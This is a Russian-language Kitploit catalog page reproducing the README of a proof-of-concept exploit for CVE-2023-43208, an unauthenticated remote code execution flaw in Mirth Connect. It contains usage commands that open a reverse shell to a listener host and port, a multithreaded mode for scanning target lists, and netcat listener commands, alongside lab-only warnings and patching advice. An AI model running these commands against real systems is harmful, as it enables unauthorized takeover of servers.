Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
PoC-2023-43208 — Эксплойт доказательства концепции для CVE-2023-43208, уязвимости удаленного выполнения кода в Mirth Connect до версии 4.4.1. | Kitploit
Инструменты/GitHubGitHub/mkirahmet/poc-2023-43208
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubmkirahmet/poc-2023-43208

PoC-2023-43208

Эксплойт доказательства концепции для CVE-2023-43208, уязвимости удаленного выполнения кода в Mirth Connect до версии 4.4.1.

Репозиторий
316 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-43208-EXPLOIT

Mirth Connect Удаленное выполнение кода (RCE) Эксплойт

Python Version Version CVE Lab Use Only

⚠️ ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ И ЛАБОРАТОРНЫХ ЦЕЛЕЙ ⚠️

Доказательство концепции эксплойта для CVE-2023-43208, уязвимости удаленного выполнения кода в Mirth Connect до версии 4.4.1.

🚨 ВАЖНОЕ ЮРИДИЧЕСКОЕ ПРЕДУПРЕЖДЕНИЕ

Этот инструмент строго предназначен для:

  • 🧪 Образовательных целей
  • 🔬 Авторизованного тестирования безопасности в лабораторных средах
  • 📚 Исследований и обучения в области кибербезопасности

НЕ ИСПОЛЬЗУЙТЕ:

  • ❌ Против систем, которые вам не принадлежат
  • ❌ Без явного письменного разрешения
  • ❌ В производственных средах
  • ❌ Для незаконных или вредоносных целей
  • Вы несете ответственность за соблюдение всех применимых законов и нормативных актов. Неправильное использование этого инструмента может привести к уголовному преследованию.

    📋 Описание

    Этот эксплойт нацелен на уязвимость десериализации XML в конечной точке /api/users Mirth Connect, позволяющую неаутентифицированное удаленное выполнение кода на уязвимых версиях (< 4.4.1).

    Это КРИТИЧЕСКАЯ уязвимость, и ее следует ТЕСТИРОВАТЬ ТОЛЬКО в изолированных лабораторных средах на собственных системах.

    🔧 Требования

    • Python 3.7 или выше
    • Необходимые пакеты, перечисленные в requirements.txt
    • ЛАБОРАТОРНАЯ СРЕДА с уязвимым экземпляром Mirth Connect

    🚀 Установка

    Клонирование репозитория

    git clone https://github.com/M0h4/CVE-2023-43208-EXPLOIT.git cd CVE-2023-43208-EXPLOIT

    Установка зависимостей

    pip install -r requirements.txt

    💻 Использование (ТОЛЬКО ДЛЯ ЛАБОРАТОРИИ)

    Интерактивный режим (рекомендуется для лаборатории)

    root@kitploit:~
    python exploit.py
    

    Режим командной строки

    root@kitploit:~
    # Эксплуатация одной цели (ТОЛЬКО ДЛЯ ЛАБОРАТОРИИ)
    python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444
    
    # Сканирование нескольких целей из файла (ТОЛЬКО ДЛЯ ЛАБОРАТОРИИ)
    python exploit.py -f targets.txt -t 50 -o vulnerable.txt
    
    # Неинтерактивный режим (ТОЛЬКО ДЛЯ ЛАБОРАТОРИИ)
    python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444 --no-interactive
    

    Параметры

    root@kitploit:~
    -u, --url       URL-адрес цели для эксплуатации (ТОЛЬКО ДЛЯ ЛАБОРАТОРИИ)
    -lh, --lhost    Прослушивающий хост (ваш IP)
    -lp, --lport    Прослушивающий порт
    -f, --file      Файл со списком URL-адресов целей для сканирования
    -o, --output    Выходной файл для сохранения результатов сканирования
    -t, --threads   Количество потоков для сканирования (по умолчанию: 50)
    --no-interactive Запуск в неинтерактивном режиме
    

    🎯 Пример лабораторной среды

    Настройте свою лабораторию:

    1. Установите уязвимую версию Mirth Connect (< 4.4.1) в изолированной виртуальной машине
    2. Используйте контролируемую сеть (например, NAT/Только хост в VirtualBox/VMware)
    3. Никогда не подвергайте воздействию интернета

    Запустите свой слушатель:

    root@kitploit:~
    ncat -lnvp 4444
    # или
    nc -lnvp 4444
    

    Запустите эксплойт в своей лаборатории:

    root@kitploit:~
    python exploit.py -u https://192.168.1.100:8443 -lh 192.168.1.50 -lp 4444
    

    🧪 Требования к тестовой среде

    • Изолированная сеть/VLAN
    • Только виртуальные машины
    • Нет производственных данных
    • Правила брандмауэра, блокирующие внешний доступ
    • Надлежащая авторизация задокументирована

    📝 Технические детали

    • Тип уязвимости: RCE через десериализацию XML
    • Затронутые версии: Mirth Connect < 4.4.1
    • Исправленная версия: 4.4.1 и выше
    • Оценка CVSS: 9.8 (Критическая)
    • Вектор атаки: Сеть
    • Требуется аутентификация: Нет

    Эксплойт использует гаджеты Commons Collections для достижения RCE через конечную точку /api/users.

    🛡️ Меры защиты

    Если вы используете Mirth Connect:

    ✅ Обновитесь до версии 4.4.1 или выше

    ✅ Ограничьте сетевой доступ к интерфейсам администратора

    ✅ Внедрите надлежащую аутентификацию

    ✅ Отслеживайте подозрительные XML-полезные нагрузки

    👥 Авторы

    • Оригинальные авторы: K3ysTr0K3R & Chocapikk
    • Модифицировано: M0h4
    • CVE: CVE-2023-43208

    ⚠️ ФИНАЛЬНОЕ ПРЕДУПРЕЖДЕНИЕ

    root@kitploit:~
    ╔══════════════════════════════════════════════════════════════╗
    ║  ЭТОТ ИНСТРУМЕНТ ТОЛЬКО ДЛЯ ЛАБОРАТОРНОГО ИСПОЛЬЗОВАНИЯ     ║
    ║  Несанкционированное использование НЕЗАКОННО и НЕЭТИЧНО      ║
    ║  Вы принимаете ВЕСЬ риск и ответственность                    ║
    ║  Автор не несет НИКАКОЙ ответственности за неправильное      ║
    ║  использование                                                ║
    ╚══════════════════════════════════════════════════════════════╝
    
    Скачать инструмент